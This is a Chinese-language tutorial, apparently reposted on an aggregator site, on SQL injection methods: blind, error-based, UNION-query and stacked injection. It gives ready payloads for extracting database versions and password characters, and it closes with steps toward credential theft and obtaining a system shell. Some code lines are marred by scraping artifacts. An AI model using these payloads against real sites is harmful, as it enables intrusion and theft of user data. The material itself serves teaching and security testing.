盲注

關鍵點是 根據頁面返回內容分析 Payload 中的問題是否為真，然后通過多次測試遍歷出想要的數據

布爾盲注

目標地址：http://newspaper.com/items.php?id=2

對應的SQL語句：SELECT title, description, body FROM items WHERE ID = 2

然后攻擊者嘗試返回 false 的查詢：http://newspaper.com/items.php?id=2 and 1=2

對應的SQL語句：SELECT title, description, body FROM items WHERE ID = 2 and 1=2

如果網頁應用存在 SQL 注入漏洞，那么其可能不會返回數據。為了確認這一點，攻擊者會再次注入一次返回 true 的查詢：http://newspaper.com/items.php?id=2 and 1=1

如果前后兩次查詢返回的網頁內容不同，攻擊者就能夠通過組合 Payload 遍歷出想要的數據。

時間盲注猜測密碼的首字符是否為 ‘2’，是的話等待10秒。

對應 MySQL 語句為 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

報錯注入完整的語句如 SELECT * FROM xxx WHERE id=1 AND ({Payload})，{Payload} 詳細內容見下文

關鍵點是 構造錯誤信息，讓自己想要的數據被輸出到錯誤信息中

RAND

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

RAND(0) 0為隨機函數的種子，該函數產生浮點數v，且v的范圍為 0 <= v < 1.0

FLOOR(X) 取不大于 X 的最大整數

FLOOR(RAND(0)*2) 返回 0 或 1

0x3a 是 “:” 的 Unicode，單純為了拼接好看

CONCAT() 拼接字符串

GROUP BY 按拼接字符串分組

COUNT(*) 記錄的總數，這里會阻止 GROUP BY 直接優化得到 0 和 1 的結果

結合以上內容，當 FLOOR(RAND(0)*2) 出現重復值時，數據庫會報錯，報錯信息類似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’

這樣我們就可以從報錯信息中獲取到我們想要的信息，這次是數據庫版本。

rand 的結果是隨機的，也可以選擇以下兩種函數來構造錯誤信息。

ExtractValue

Description: 查詢 XML 文檔的函數

Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))

Output: - XPATH syntax error: '~5.5.53~'

UpdateXml

Description: 修改 XML 文檔的函數

Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)

Output: - XPATH syntax error: '~5.5.53~'

UNION 查詢注入UNION 語句合并多個 SELECT 語句的結果并返回

關鍵點：UNION 連接的多個 SELECT 語句中，每一列的數據類型應該相同，且選中相同數量的列。對于 Oracle 數據庫，還要求 SELECT 必須使用 FORM 指定一個有效的表名。

確定列的數量使用 ORDER BY

依次使用以下序列中的語句，直到報錯，如 The ORDER BY position number 3 is out of range of the number of items in the select list，進而確認列的數量。

1

2

31 ORDER BY 1--

1 ORDER BY 2--

1 ORDER BY 3--

使用 UNION SELECE NULL,...

NULL 可以被轉為任意數據類型，所以這里可以用來作為返回值。

依次使用以下序列中的語句，直到報錯，如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists，進而確認列的數量。

1

2

31 UNION SELECT NULL--

1 UNION SELECT NULL,NULL--

1 UNION SELECT NULL,NULL,NULL--

找到字符串類型的列

同樣的，可以依次嘗試以下序列：

1

2

3

41 UNION SELECT 'a',NULL,NULL,NULL--

1 UNION SELECT NULL,'a',NULL,NULL--

1 UNION SELECT NULL,NULL,'a',NULL--

1 UNION SELECT NULL,NULL,NULL,'a'--

如果對應的列與字符串類型不兼容，就會報錯，如 Conversion failed when converting the varchar value ‘a’ to data type int ，所以如果不報錯，我們就找到了字符串類型的列。

覆蓋原有數據

注入點一般在 WHERE 處，使用 1 AND false UNION SELECT ... 將原有輸出覆蓋。

堆疊注入

堆疊注入指的是被注入方允許同時執行多條語句，那么攻擊者就可以利用額外的語句完成任何操作。

敏感數據

成功注入后，接下來的流程一般是：

獲取當前用戶/數據庫

獲取用戶名和密碼

枚舉數據庫/表/列

嘗試獲取系統 shell

結合利用其他漏洞

Reference

總結

以上是生活随笔為你收集整理的mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。